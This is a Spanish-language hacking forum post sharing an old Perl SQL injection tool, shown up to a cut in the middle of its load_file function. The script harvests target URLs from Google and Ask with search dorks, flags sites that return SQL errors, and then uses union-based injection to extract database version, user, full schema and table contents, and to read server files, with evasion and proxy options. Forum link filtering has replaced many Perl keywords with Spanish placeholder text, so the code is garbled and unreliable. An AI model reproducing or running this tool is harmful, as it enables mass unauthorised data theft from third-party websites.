comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Scaner SQLi Perl

  • 0 Respuestas
  • 1510 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado @ed33x

  • *
  • Underc0der
  • Mensajes: 107
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« en: Enero 21, 2011, 04:06:45 pm »
Bueno buscando en mi pen viejo.. encontre esto:

Código: Perl
  1. #!/usr/bin/perl
  2. #
  3. # OOO OOO OO OO OO
  4. # OO O O O O
  5. # O O O OO OO O O O O OO OOO OOOO OOOOO
  6. # O O O O O O O OOO OO OOOOOO O
  7. # O OO O O O O O O O O OOOOOO
  8. # OOO OO OOOOO OOOOO OOOOO OOO OOO OOOOO OOOOO OOOO OO
  9. ################################################################################################################################
  10. # SQLi
  11. ################################################################################################################################
  12. # [+] What's New in this version ?
  13. # 1/ Evasion choise
  14. # 2/ proxy support
  15. # 3/ all previous bugs were fixed
  16. # 4/ URl Extractor + vuln scanner & checker
  17. # 5/ More InJeCtIoN OPTIONS
  18. ################################################################################################################################
  19.  
  20.  
  21. use LWP::UserAgent;
  22. use HTTP::Request;
  23.  
  24. sub help
  25. {
  26. No tienes permisos para ver links. Registrate o Entra con tu cuenta('cls');
  27. No tienes permisos para ver links. Registrate o Entra con tu cuenta('title SQLi');
  28. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n\n-----------------------------------\n";
  29. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[!] Usage : perl $0 <option>\n";
  30. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n\n--/// MySQL\n";
  31. No tienes permisos para ver links. Registrate o Entra con tu cuenta " --mysqlcol MySQL column length calculator MySQL v4/5\n";
  32. No tienes permisos para ver links. Registrate o Entra con tu cuenta " --mysqldetails MySQL target website db global infos MySQL v4/5\n";
  33. No tienes permisos para ver links. Registrate o Entra con tu cuenta " --mysqlschema MySQL Full Schema Extractor MySQL v5\n";
  34. No tienes permisos para ver links. Registrate o Entra con tu cuenta " --mysqldump MySQL Data Dump MySQL v4/5\n";
  35. No tienes permisos para ver links. Registrate o Entra con tu cuenta " --mysqlfile MySQL load_file fuzzer MySQL v4/5\n";
  36. No tienes permisos para ver links. Registrate o Entra con tu cuenta " --mysqltblfuzz MySQL Table_name Fuzzer MySQL v4\n";
  37. No tienes permisos para ver links. Registrate o Entra con tu cuenta " --mysqlcolfuzz MySQL Column_name Fuzzer MySQL v4\n";
  38. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n\n--/// MsSQL\n";
  39. No tienes permisos para ver links. Registrate o Entra con tu cuenta " --mssqldetails MsSQL DB global info\n";
  40. No tienes permisos para ver links. Registrate o Entra con tu cuenta " --mssqltable MsSQL Tables Extractor\n";
  41. No tienes permisos para ver links. Registrate o Entra con tu cuenta " --mssqlcolumns MsSQL Columns Extractor\n";
  42. No tienes permisos para ver links. Registrate o Entra con tu cuenta " --mssqldump MsSQL Columns Extractor\n";
  43. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n\n--/// Vulunerability Scanner\n";
  44. No tienes permisos para ver links. Registrate o Entra con tu cuenta " --dork URL Extractor , SQL Vulnerability's Scanner & checker\n";
  45. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n\n--/// Options\n";
  46. No tienes permisos para ver links. Registrate o Entra con tu cuenta " --proxy define a proxy to use\n";
  47. No tienes permisos para ver links. Registrate o Entra con tu cuenta " --listfile list of columns or tables to use in fuzz or load_file files list\n";
  48. No tienes permisos para ver links. Registrate o Entra con tu cuenta " --output save injection or scan result in an outside file\n";
  49. No tienes permisos para ver links. Registrate o Entra con tu cuenta " --table table to use in dumping data or in tbles extract\n";
  50. No tienes permisos para ver links. Registrate o Entra con tu cuenta " --column column to use in dumping data or in column extract\n";
  51. No tienes permisos para ver links. Registrate o Entra con tu cuenta " --help print this help text :P\n";
  52. No tienes permisos para ver links. Registrate o Entra con tu cuenta();
  53. }
  54.  
  55. sub variables
  56. {
  57. my $i=0;
  58. foreach (@ARGV)
  59. {
  60. if ($ARGV[$i] eq "--dork"){$search_dork = $ARGV[$i+1]}
  61. if ($ARGV[$i] eq "--mysqlcol"){$mysql_count_target = $ARGV[$i+1]}
  62. if ($ARGV[$i] eq "--mysqldetails"){$mysql_details_target = $ARGV[$i+1]}
  63. if ($ARGV[$i] eq "--mysqlschema"){$mysql_schema_target = $ARGV[$i+1]}
  64. if ($ARGV[$i] eq "--mysqldump"){$mysql_dump_target = $ARGV[$i+1]}
  65. if ($ARGV[$i] eq "--mysqltblfuzz"){$mysql_fuzz_table = $ARGV[$i+1]}
  66. if ($ARGV[$i] eq "--mysqlcolfuzz"){$mysql_fuzz_column = $ARGV[$i+1]}
  67. if ($ARGV[$i] eq "--mysqlfile"){$mysql_load_file = $ARGV[$i+1]}
  68. if ($ARGV[$i] eq "--mssqldetails"){$mssql_details_target = $ARGV[$i+1]}
  69. if ($ARGV[$i] eq "--mssqltable"){$mssql_table_target = $ARGV[$i+1]}
  70. if ($ARGV[$i] eq "--mssqlcolumn"){$mssql_column_target = $ARGV[$i+1]}
  71. if ($ARGV[$i] eq "--mssqldump"){$mssql_dump_target = $ARGV[$i+1]}
  72. if ($ARGV[$i] eq "--column"){$sql_dump_column = $ARGV[$i+1]}
  73. if ($ARGV[$i] eq "--table"){$sql_dump_table = $ARGV[$i+1]}
  74. if ($ARGV[$i] eq "--evasion"){$evasion = $ARGV[$i+1]}
  75. if ($ARGV[$i] eq "--output"){$vulnfile = $ARGV[$i+1]}
  76. if ($ARGV[$i] eq "--proxy"){$proxy = $ARGV[$i+1]}
  77. if ($ARGV[$i] eq "--listfile"){$word_list = $ARGV[$i+1]}
  78. if ($ARGV[$i] eq "--help"){&help}
  79. $i++;
  80. }
  81. }
  82.  
  83. sub main
  84. {
  85. No tienes permisos para ver links. Registrate o Entra con tu cuenta('cls');
  86. No tienes permisos para ver links. Registrate o Entra con tu cuenta('title SQL InJeCtoR v2.0');
  87. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n\n\n\n OOO OOO OO OO OO\n" ;
  88. No tienes permisos para ver links. Registrate o Entra con tu cuenta " OO O O O O\n" ;
  89. No tienes permisos para ver links. Registrate o Entra con tu cuenta " O O O OO OO O O O O OO OOO OOOO OOOOO\n" ;
  90. No tienes permisos para ver links. Registrate o Entra con tu cuenta " O O O O O O O OOO OO OOOOOO O\n" ;
  91. No tienes permisos para ver links. Registrate o Entra con tu cuenta " O OO O O O O O O O O OOOOOO\n" ;
  92. No tienes permisos para ver links. Registrate o Entra con tu cuenta " OOO OO OOOOO OOOOO OOOOO OOO OOO OOOOO OOOOO OOOO OO\n" ;
  93. No tienes permisos para ver links. Registrate o Entra con tu cuenta " \n\n SQLi";
  94. if (@ARGV<1){No tienes permisos para ver links. Registrate o Entra con tu cuenta "[!] For Help : perl $0 --help\n\n\n" ;}
  95. }
  96.  
  97. sub vulnscanner
  98. {
  99. checkgoogle();
  100. googlescan($search_dork);
  101. askscan($search_dork);
  102. }
  103.  
  104. sub checkgoogle
  105. {
  106. my $request = HTTP::Request->new(GET => "http://www.google.com/search?hl=en&q=$search_dork&btnG=Search&start=10");
  107. my $useragent = LWP::UserAgent->new(agent => 'FAST-WebCrawler/3.3');
  108. $useragent->proxy("http", "http://$proxy/") if No tienes permisos para ver links. Registrate o Entra con tu cuenta($proxy);
  109. my $response = $useragent->request($request) ;
  110. my $result = $response->content;
  111. if ($result =~ m/if you suspect that your computer or network has been infected/i){No tienes permisos para ver links. Registrate o Entra con tu cuenta "[!] You Have Been Banned From Google Search :( \n";No tienes permisos para ver links. Registrate o Entra con tu cuenta()}
  112. }
  113.  
  114. sub googlescan
  115. {
  116. my $dork = $_[0];
  117. for ($i=0;$i<200;$i=$i+10)
  118. {
  119. my $request = HTTP::Request->new(GET => "http://www.google.com/search?hl=en&q=$dork&btnG=Search&start=$i");
  120. my $useragent = LWP::UserAgent->new(agent => 'FAST-WebCrawler/3.3');
  121. $useragent->proxy("http", "http://$proxy/") if No tienes permisos para ver links. Registrate o Entra con tu cuenta($proxy);
  122. my $response = $useragent->request($request) ;
  123. my $result = $response->content;
  124. while ($result =~ m/class=r><a href="(.*?)\" class=l>/g )
  125. {
  126. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[!] Trying to fuzz $1n";
  127. checkvuln($1)
  128. }
  129. }
  130. }
  131.  
  132. sub askscan
  133. {
  134. my $dork = $_[0];
  135. for ($i=0;$i<20;$i++)
  136. {
  137. my $request = HTTP::Request->new(GET => "http://www.ask.com/web?q=page.php?id=&qsrc=0&o=0&l=dir&q=$dork&page=$i&jss=");
  138. my $useragent = LWP::UserAgent->new(agent => 'FAST-WebCrawler/3.3');
  139. $useragent->proxy("http", "http://$proxy/") if No tienes permisos para ver links. Registrate o Entra con tu cuenta($proxy);
  140. my $response = $useragent->request($request) ;
  141. my $result = $response->content;
  142. while ($result =~ m/<span id="r(.*)_u\" class=\"(.*)\">(.*)<\/span>/gi)
  143. {
  144. my $askurl ="http://".$3 ;
  145. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[!] Trying to fuzz $askurl\n";
  146. checkvuln($askurl);
  147. }
  148. }
  149. }
  150.  
  151. sub checkvuln
  152. {
  153. my $scan_url = $_[0];
  154. my $link = $scan_url.'0+order+by+9999999--';
  155. my $ua = LWP::UserAgent->new();
  156. $ua->proxy("http", "http://$proxy/") if No tienes permisos para ver links. Registrate o Entra con tu cuenta($proxy);
  157. my $req = $ua->get($link);
  158. my $fuzz = $req->content;
  159. if ($fuzz =~ m/You have an error in your SQL syntax/i || $fuzz =~ m/Query failed/i || $fuzz =~ m/SQL query failed/i || $fuzz =~ m/mysql_fetch_/i || $fuzz =~ m/mysql_fetch_array/i || $fuzz =~ m/mysql_num_rows/i || $fuzz =~ m/The used SELECT statements have a different number of columns/i )
  160. {
  161. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[!] MySQL Vulnerable -> $scan_url\n";
  162. if (No tienes permisos para ver links. Registrate o Entra con tu cuenta($vulnfile))
  163. {
  164. No tienes permisos para ver links. Registrate o Entra con tu cuenta (@mysqlvuln,"$scan_url\n");
  165. }
  166. }
  167. elsif ($fuzz =~ m/ODBC SQL Server Driver/i)
  168. {
  169. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[!] MsSQL Vulnerable -> $scan_url\n";
  170. if (No tienes permisos para ver links. Registrate o Entra con tu cuenta($vulnfile))
  171. {
  172. No tienes permisos para ver links. Registrate o Entra con tu cuenta (@mssqlvuln,"$scan_url\n");
  173. }
  174. }
  175. elsif ($fuzz =~ m/Microsoft JET Database/i || $fuzz =~ m/ODBC Microsoft Access Driver/i )
  176. {
  177. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[!] MS Access Vulnerable -> $scan_url\n";
  178. if (No tienes permisos para ver links. Registrate o Entra con tu cuenta($vulnfile))
  179. {
  180. No tienes permisos para ver links. Registrate o Entra con tu cuenta (@accessvuln,"$scan_url\n");
  181. }
  182. }
  183. }
  184.  
  185. sub mysqlcount
  186. {
  187. my $site = $_[0];
  188. my $ev = $_[1];
  189. my $null = "09+and+1=" ;
  190. my $code = "0+union+select+" ;
  191. if ($ev eq '/*')
  192. {$add = "/**/" ; $com = "/*";}
  193. elsif ($ev eq '%20')
  194. {$add = "%20" ; $com = "%00" ;}
  195. else
  196. {$add = '+' ; $com ='--';}
  197. my $injection = $site.$null.$code."0",$com ;
  198. my $useragent = LWP::UserAgent->new();
  199. $useragent->proxy("http", "http://$proxy/") if No tienes permisos para ver links. Registrate o Entra con tu cuenta($proxy);
  200. my $response = $useragent->get($injection);
  201. my $result = $response->content;
  202. if( $result =~ m/You have an error in your SQL syntax/i || $result =~ m/Query failed/i || $result =~ m/SQL query failed/i || $result =~ m/mysql_fetch_/i || $result =~ m/mysql_fetch_array/i || $result =~ m/mysql_num_rows/i || $result =~ m/The used SELECT statements have a different number of columns/i )
  203. {
  204. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[!] This Website Is Vulnerable\n" ;
  205. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Working On It\n";
  206. }
  207. else
  208. {
  209. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[!] This WebSite Is Not SQL Vulnerable !\n";
  210. No tienes permisos para ver links. Registrate o Entra con tu cuenta();
  211. }
  212. for ($i = 0 ; $i < 100 ; $i ++)
  213. {
  214. $col.=','.$i;
  215. $specialword.=','."0x617a38387069783030713938";
  216. if ($i == 0)
  217. {
  218. $specialword = '' ;
  219. $col = '' ;
  220. }
  221. $sql=$site.$null.$code."0x617a38387069783030713938".$specialword.$com ;
  222. $ua = LWP::UserAgent->new();
  223. $ua->proxy("http", "http://$proxy/") if No tienes permisos para ver links. Registrate o Entra con tu cuenta($proxy);
  224. $rq = $ua->get($sql);
  225. $response = $rq->content;
  226. if($response =~ /az88pix00q98/)
  227. {
  228. $i ++;
  229. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[!] MySQL Column Count Finished\n" ;
  230. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[!] This WebSite Have $i Columns\n" ;
  231. $sql=$site.$null.$code."0".$col.$com ;
  232. No tienes permisos para ver links. Registrate o Entra con tu cuenta "=> ".$sql ."\n\n";
  233. if (No tienes permisos para ver links. Registrate o Entra con tu cuenta($vulnfile))
  234. {
  235. No tienes permisos para ver links. Registrate o Entra con tu cuenta(vuln_file,">>$vulnfile") ;
  236. No tienes permisos para ver links. Registrate o Entra con tu cuenta vuln_file "Target Host : $site\n";
  237. No tienes permisos para ver links. Registrate o Entra con tu cuenta vuln_file "Evasion : $ev\n";
  238. No tienes permisos para ver links. Registrate o Entra con tu cuenta vuln_file "Col length : $i\n";
  239. No tienes permisos para ver links. Registrate o Entra con tu cuenta vuln_file "Injection : $sql\n";
  240. No tienes permisos para ver links. Registrate o Entra con tu cuenta(vuln_file);
  241. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Result Saved to $vulnfile\n";
  242. }
  243. No tienes permisos para ver links. Registrate o Entra con tu cuenta () ;
  244. }
  245. }
  246. }
  247.  
  248. sub mysqldetails
  249. {
  250. my $site = $_[0];
  251. my $ev = $_[1];
  252. if ($ev eq '/*')
  253. {$add = "/**/" ; $com = "/*";}
  254. elsif ($ev eq '%20')
  255. {$add = "%20" ; $com = "%00" ;}
  256. else
  257. {$add = '+' ; $com ='--';}
  258. my $selection = "concat(0x617a38387069783030713938,version(),0x617a38387069783030713938,database(),0x617a38387069783030713938,user(),0x617a38387069783030713938)";
  259. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[+] Info Getting, Started Please Wait ....\n\n";
  260. if ($site =~ /(.*)NullArea(.*)/i)
  261. {
  262. my $newlink = $1.$selection.$2.$com;
  263. my $ua = LWP::UserAgent->new();
  264. $ua->proxy("http", "http://$proxy/") if No tienes permisos para ver links. Registrate o Entra con tu cuenta($proxy);
  265. my $request = $ua->get($newlink);
  266. my $content = $request->content;
  267. if ($content =~ /az88pix00q98(.*)az88pix00q98(.*)az88pix00q98(.*)az88pix00q98/)
  268. {
  269. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[!] Database Version : $1\n";
  270. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[!] Database Name : $2\n";
  271. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[!] DB UserName : $3\n";
  272. if (No tienes permisos para ver links. Registrate o Entra con tu cuenta($vulnfile))
  273. {
  274. No tienes permisos para ver links. Registrate o Entra con tu cuenta(vuln_file,">>$vulnfile") ;
  275. No tienes permisos para ver links. Registrate o Entra con tu cuenta vuln_file "[!] Target : $site\n";
  276. No tienes permisos para ver links. Registrate o Entra con tu cuenta vuln_file "[!] evasion : $ev\n";
  277. No tienes permisos para ver links. Registrate o Entra con tu cuenta vuln_file "[!] Database Version : $1\n";
  278. No tienes permisos para ver links. Registrate o Entra con tu cuenta vuln_file "[!] Database Name : $2\n";
  279. No tienes permisos para ver links. Registrate o Entra con tu cuenta vuln_file "[!] DB UserName : $3\n";
  280. No tienes permisos para ver links. Registrate o Entra con tu cuenta(vuln_file);
  281. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[+] Result Saved to $vulnfile\n";
  282. }
  283. No tienes permisos para ver links. Registrate o Entra con tu cuenta () ;
  284. }
  285. else
  286. {
  287. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[!] Failed\n";
  288. No tienes permisos para ver links. Registrate o Entra con tu cuenta () ;
  289. }
  290. }
  291. else
  292. {
  293. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Please Enter the target this way :\n http://target.net/page.php?id=0+union+select+1,2,nullarea,3\n";
  294. No tienes permisos para ver links. Registrate o Entra con tu cuenta () ;
  295. }
  296. }
  297.  
  298. sub mysqlschema
  299. {
  300. my $site = $_[0];
  301. my $ev = $_[1];
  302. my @schema=();
  303. if ($ev eq '/*')
  304. {$add = "/**/" ; $com = "/*";}
  305. elsif ($ev eq '%20')
  306. {$add = "%20" ; $com = "%00" ;}
  307. else
  308. {$add = '+' ; $com ='--';}
  309. my $selection = "concat(0x617a38387069783030713938,column_name,0x617a38387069783030713938,table_name,0x617a38387069783030713938,table_schema,0x617a38387069783030713938)";
  310. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[+] Schema Extracting, Started Please Wait ....\n\n";
  311. if ($site =~ /(.*)NullArea(.*)/i)
  312. {
  313. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Column :|: Table :|: Database\n";
  314. for ($i=0; $i<=1500 ; $i++ )
  315. {
  316. $newstring = $1.$selection.$2.$add.'from'.$add.'information_schema.columns'.$add.'LIMIT'.$add.$i.','.'1'.$com;
  317. my $ua = LWP::UserAgent->new();
  318. $ua->proxy("http", "http://$proxy/") if No tienes permisos para ver links. Registrate o Entra con tu cuenta($proxy);
  319. my $request = $ua->get($newstring);
  320. my $content = $request->content;
  321. if ($content =~ /az88pix00q98(.*)az88pix00q98(.*)az88pix00q98(.*)az88pix00q98/)
  322. {
  323. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[!] $1 :|: $2 :|: $3 \n";
  324. No tienes permisos para ver links. Registrate o Entra con tu cuenta (@schema,"$1 :|: $2 :|: $3 \n");
  325. }
  326. }
  327. if (No tienes permisos para ver links. Registrate o Entra con tu cuenta($vulnfile))
  328. {
  329. No tienes permisos para ver links. Registrate o Entra con tu cuenta(vuln_file,">>$vulnfile") ;
  330. No tienes permisos para ver links. Registrate o Entra con tu cuenta vuln_file "[!] Target : $site\n";
  331. No tienes permisos para ver links. Registrate o Entra con tu cuenta vuln_file "[!] evasion : $ev\n";
  332. No tienes permisos para ver links. Registrate o Entra con tu cuenta vuln_file "[!] Schema :: ---- \n\n\n";
  333. $i=0;
  334. foreach(@schema)
  335. {
  336. No tienes permisos para ver links. Registrate o Entra con tu cuenta vuln_file $schema[$i]."\n";
  337. $i++;
  338. }
  339. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[+] Result Saved to $vulnfile\n";
  340. }
  341. }
  342. else
  343. {
  344. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Please Enter the target this way :\n http://target.net/page.php?id=0+union+select+1,2,nullarea,3\n";
  345. No tienes permisos para ver links. Registrate o Entra con tu cuenta () ;
  346. }
  347. }
  348.  
  349. sub mysqldump
  350. {
  351. my $site = $_[0];
  352. my $colm = $_[1];
  353. my $tble = $_[2];
  354. my $ev = $_[3];
  355. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Table name $tble\n";
  356. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Column name $colm\n";
  357. my @dumper=();
  358. if ($ev eq '/*')
  359. {$add = "/**/" ; $com = "/*";}
  360. elsif ($ev eq '%20')
  361. {$add = "%20" ; $com = "%00" ;}
  362. else
  363. {$add = '+' ; $com ='--';}
  364. my $selection = "concat(0x617a38387069783030713938,$colm,0x617a38387069783030713938)";
  365. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[+] Data Dump Started Please Wait ....\n\n";
  366. if ($site =~ /(.*)NullArea(.*)/i)
  367. {
  368. $i=0;
  369. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Dumped Data : //// \n";
  370. do
  371. {
  372. $newstring = $1.$selection.$2.$add.'from'.$add.$tble.$add.'LIMIT'.$add.$i.','.'1'.$com;
  373. my $ua = LWP::UserAgent->new();
  374. $ua->proxy("http", "http://$proxy/") if No tienes permisos para ver links. Registrate o Entra con tu cuenta($proxy);
  375. my $request = $ua->get($newstring);
  376. my $content = $request->content;
  377. if ($content =~ /az88pix00q98(.*)az88pix00q98/)
  378. {
  379. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[!] $1 \n";
  380. No tienes permisos para ver links. Registrate o Entra con tu cuenta(@dumper,"$1\n");
  381. }
  382. $i++;
  383. }
  384. while ($i<1500);
  385. if (No tienes permisos para ver links. Registrate o Entra con tu cuenta($vulnfile))
  386. {
  387. No tienes permisos para ver links. Registrate o Entra con tu cuenta(vuln_file,">>$vulnfile") ;
  388. No tienes permisos para ver links. Registrate o Entra con tu cuenta vuln_file "[!] Target : $site\n";
  389. No tienes permisos para ver links. Registrate o Entra con tu cuenta vuln_file "[!] evasion : $ev\n";
  390. No tienes permisos para ver links. Registrate o Entra con tu cuenta vuln_file "[!] Dumped Column : $colm\n";
  391. No tienes permisos para ver links. Registrate o Entra con tu cuenta vuln_file "[!] Dumped Table : $tble\n";
  392. No tienes permisos para ver links. Registrate o Entra con tu cuenta vuln_file "[!] Data :: ---- \n\n\n";
  393. $i=0;
  394. foreach(@dumper)
  395. {
  396. No tienes permisos para ver links. Registrate o Entra con tu cuenta vuln_file $dumper[$i]."\n";
  397. $i++;
  398. }
  399. No tienes permisos para ver links. Registrate o Entra con tu cuenta(vuln_file);
  400. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[+] Result Saved to $vulnfile\n";
  401. }
  402. }
  403. else
  404. {
  405. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Please Enter the target this way :\n http://target.net/page.php?id=0+union+select+1,2,nullarea,3\n";
  406. No tienes permisos para ver links. Registrate o Entra con tu cuenta () ;
  407. }
  408. }
  409.  
  410. sub mysqlfuzztable
  411. {
  412. my $site = $_[0];
  413. my $ev = $_[1];
  414. my $filelst = $_[2];
  415. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] File List $filelst\n";
  416. my @tbles_possible=();
  417. if ($ev eq '/*')
  418. {$add = "/**/" ; $com = "/*";}
  419. elsif ($ev eq '%20')
  420. {$add = "%20" ; $com = "%00" ;}
  421. else
  422. {$add = '+' ; $com ='--';}
  423. No tienes permisos para ver links. Registrate o Entra con tu cuenta (word_list_file,"$filelst") or No tienes permisos para ver links. Registrate o Entra con tu cuenta "[!] Couldnt Open WordList File $!\n";
  424. @word_list_search = <word_list_file> ;
  425. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[+] Fuzzing Table, Started Please Wait ....\n\n";
  426. if ($site =~ /(.*)NullArea(.*)/i)
  427. {
  428. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Fuzz Result : //// \n\n";
  429. $i=0;
  430. foreach (@word_list_search)
  431. {
  432. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[!] Trying To Fuzz Table_name with $word_list_search[$i]";
  433. $newstring = $1."0x617a38387069783030713938".$2.$add.'from'.$add.$word_list_search[$i].$com;
  434. my $ua = LWP::UserAgent->new();
  435. $ua->proxy("http", "http://$proxy/") if No tienes permisos para ver links. Registrate o Entra con tu cuenta($proxy);
  436. my $request = $ua->get($newstring);
  437. my $content = $request->content;
  438. if ($content =~ /az88pix00q98/)
  439. {
  440. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[!] Found Table ! $word_list_search[$i] \n";
  441. No tienes permisos para ver links. Registrate o Entra con tu cuenta(@tbles_possible,"$word_list_search[$i]\n");
  442. }
  443. $i++;
  444. }
  445. if (No tienes permisos para ver links. Registrate o Entra con tu cuenta($vulnfile))
  446. {
  447. No tienes permisos para ver links. Registrate o Entra con tu cuenta(vuln_file,">>$vulnfile") ;
  448. No tienes permisos para ver links. Registrate o Entra con tu cuenta vuln_file "[!] Target : $site\n";
  449. No tienes permisos para ver links. Registrate o Entra con tu cuenta vuln_file "[!] evasion : $ev\n";
  450. No tienes permisos para ver links. Registrate o Entra con tu cuenta vuln_file "[!] Wordlist : $filelst\n";
  451. No tienes permisos para ver links. Registrate o Entra con tu cuenta vuln_file "[!] Tbles Found :: ---- \n\n\n";
  452. $i=0;
  453. foreach(@tbles_possible)
  454. {
  455. No tienes permisos para ver links. Registrate o Entra con tu cuenta vuln_file $tbles_possible[$i]."\n";
  456. $i++;
  457. }
  458. No tienes permisos para ver links. Registrate o Entra con tu cuenta(vuln_file);
  459. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[+] Result Saved to $vulnfile\n";
  460. }
  461. }
  462. else
  463. {
  464. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Please Enter the target this way :\n http://target.net/page.php?id=0+union+select+1,2,nullarea,3\n";
  465. No tienes permisos para ver links. Registrate o Entra con tu cuenta () ;
  466. }
  467. }
  468.  
  469. sub mysqlfuzzcolumn
  470. {
  471. my $site = $_[0];
  472. my $ev = $_[1];
  473. my $filelst = $_[2];
  474. my $tablext = $_[3];
  475. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] File List $filelst\n";
  476. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Table To Fuzz Columns $tablext\n";
  477. my @cols_possible=();
  478. if ($ev eq '/*')
  479. {$add = "/**/" ; $com = "/*";}
  480. elsif ($ev eq '%20')
  481. {$add = "%20" ; $com = "%00" ;}
  482. else
  483. {$add = '+' ; $com ='--';}
  484. No tienes permisos para ver links. Registrate o Entra con tu cuenta (word_list_file,"$filelst") or No tienes permisos para ver links. Registrate o Entra con tu cuenta "[!] Couldnt Open WordList File $!\n";
  485. @word_list_search = <word_list_file> ;
  486. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[+] Fuzzing Column, Started Please Wait ....\n\n";
  487. if ($site =~ /(.*)NullArea(.*)/i)
  488. {
  489. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Fuzz Result : //// \n\n";
  490. $i=0;
  491. foreach (@word_list_search)
  492. {
  493. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[!] Trying To Fuzz Column_name with $word_list_search[$i]";
  494. $newstring = $1."concat(0x617a38387069783030713938,$word_list_search[$i])".$2.$add.'from'.$add.$tablext.$com;
  495. my $ua = LWP::UserAgent->new();
  496. $ua->proxy("http", "http://$proxy/") if No tienes permisos para ver links. Registrate o Entra con tu cuenta($proxy);
  497. my $request = $ua->get($newstring);
  498. my $content = $request->content;
  499. if ($content =~ /az88pix00q98/)
  500. {
  501. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[!] File Column ! $word_list_search[$i] \n";
  502. No tienes permisos para ver links. Registrate o Entra con tu cuenta(@cols_possible,"$word_list_search[$i]\n");
  503. }
  504. $i++;
  505. }
  506. if (No tienes permisos para ver links. Registrate o Entra con tu cuenta($vulnfile))
  507. {
  508. No tienes permisos para ver links. Registrate o Entra con tu cuenta(vuln_file,">>$vulnfile") ;
  509. No tienes permisos para ver links. Registrate o Entra con tu cuenta vuln_file "[!] Target : $site\n";
  510. No tienes permisos para ver links. Registrate o Entra con tu cuenta vuln_file "[!] evasion : $ev\n";
  511. No tienes permisos para ver links. Registrate o Entra con tu cuenta vuln_file "[!] Wordlist : $filelst\n";
  512. No tienes permisos para ver links. Registrate o Entra con tu cuenta vuln_file "[!] Cols Found :: ---- \n\n\n";
  513. $i=0;
  514. foreach(@cols_possible)
  515. {
  516. No tienes permisos para ver links. Registrate o Entra con tu cuenta vuln_file $cols_possible[$i]."\n";
  517. $i++;
  518. }
  519. No tienes permisos para ver links. Registrate o Entra con tu cuenta(vuln_file);
  520. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[+] Result Saved to $vulnfile\n";
  521. }
  522. }
  523. else
  524. {
  525. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Please Enter the target this way :\n http://target.net/page.php?id=0+union+select+1,2,nullarea,3\n";
  526. No tienes permisos para ver links. Registrate o Entra con tu cuenta () ;
  527. }
  528. }
  529.  
  530. sub mysqlfile
  531. {
  532. my $site = $_[0];
  533. my $ev = $_[1];
  534. my $filelst = $_[2];
  535. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] File List $filelst\n";
  536. my @cols_possible=();
  537. if ($ev eq '/*')
  538. {$add = "/**/" ; $com = "/*";}
  539. elsif ($ev eq '%20')
  540. {$add = "%20" ; $com = "%00" ;}
  541. else
  542. {$add = '+' ; $com ='--';}
  543. No tienes permisos para ver links. Registrate o Entra con tu cuenta (word_list_file,"$filelst") or No tienes permisos para ver links. Registrate o Entra con tu cuenta "[!] Couldnt Open WordList File $!\n";
  544. @word_list_search = <word_list_file> ;
  545. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[+] File Fuzz, Started Please Wait ....\n\n";
  546. if ($site =~ /(.*)NullArea(.*)/i)
  547. {
  548. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Fuzz Result : //// \n\n";
  549. $i=0;
  550. foreach (@word_list_search)
  551. {
  552. $newstring = $1."concat(0x617a38387069783030713938,load_file('$word_list_search[$i]'))".$2.$com;
  553. my $ua = LWP::UserAgent->new();
